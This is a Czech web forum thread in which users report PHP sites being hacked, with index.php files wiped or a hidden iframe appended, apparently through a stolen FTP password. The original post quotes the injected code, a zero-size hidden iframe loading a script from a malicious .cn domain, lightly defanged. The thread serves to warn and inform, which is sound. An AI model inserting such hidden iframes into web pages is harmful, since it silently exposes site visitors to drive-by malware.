ORENTRAFF.cn

Obecné fórum o čemkoliv, off-topic záležitosti.

Moderátoři: zdespi, Moderátoři

Odpovědět
Duha
Začatečník
Začatečník
Příspěvky: 85
Registrován: pon lis 01, 2004 3:54 pm
Bydliště: Strakonice
Kontaktovat uživatele:

ORENTRAFF.cn

Příspěvek od Duha »

Zdravím,
komu nějaká havěť taky napadla PHP stránky?
Likviduje to INDEX.PHP, na několika se mi ale stalo že to "jen" přidalo

<iframe src="hxxp://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe>

(teda místo hxxp klasika)

Přes WHOIS to vyhází podivné údaje...
S podivem je, že máme stránky na Active24 (Linux)...
Tak bacha na to a kontrolujte stránky!

Mějte se,
Duha
Uživatelský avatar
dejvidek
Administrator
Administrator
Příspěvky: 2256
Registrován: pát srp 27, 2004 12:24 pm
Kontaktovat uživatele:

Příspěvek od dejvidek »

Je něco divného na active24? :D Nějak je ta havěť na ně zaměřená? :-)
dejv
Duha
Začatečník
Začatečník
Příspěvky: 85
Registrován: pon lis 01, 2004 3:54 pm
Bydliště: Strakonice
Kontaktovat uživatele:

Příspěvek od Duha »

Nevím nevím, googlil jsem a na pár zpráv ohledně nefunkčnosti stránek v souvislosti s Orentraff.cn jsem našel... smaže to obsah INDEX.PHP a leze to napříč netem :?
Honza
 
Příspěvky: 4322
Registrován: úte lis 30, 2004 10:50 am

Příspěvek od Honza »

Duha píše:smaže to obsah INDEX.PHP a leze to napøíè netem :?
Jak smaže? To snad není taková p.del - nebo nìjaký security trouble apache? Hodily by se probrobnosti toho, co a za jakých okolností to mùže napadnout.
Duha
Začatečník
Začatečník
Příspěvky: 85
Registrován: pon lis 01, 2004 3:54 pm
Bydliště: Strakonice
Kontaktovat uživatele:

Příspěvek od Duha »

Honza píše:Jak smaže? To snad není taková p.del
To mě právě dostalo, nejdřív jsem myslel že jim třeba spadnul server a nepovedla se obnova filesystému, ale pak v dalších index.php jsem zjistil že to třeba na konec souboru přidalo to <iframe>, další měl zas velikost 0 byte...
Každopádně je to hustý :shock:
Duha
Začatečník
Začatečník
Příspěvky: 85
Registrován: pon lis 01, 2004 3:54 pm
Bydliště: Strakonice
Kontaktovat uživatele:

Příspěvek od Duha »

Zdravím,
tak mi bylo podporou hostingu sděleno že ty změny přišly z IP ze Singapuru, zřejmě odposlechnutý heslo k FTP a robot zařídil zbytek :?
Jen mě mate že to bylo na hromadě stránek i ve světě...
(ode dneška už k FTP přistupuju přes SSL) :)

Mějte se, a hlavně keep crunching :D
Odpovědět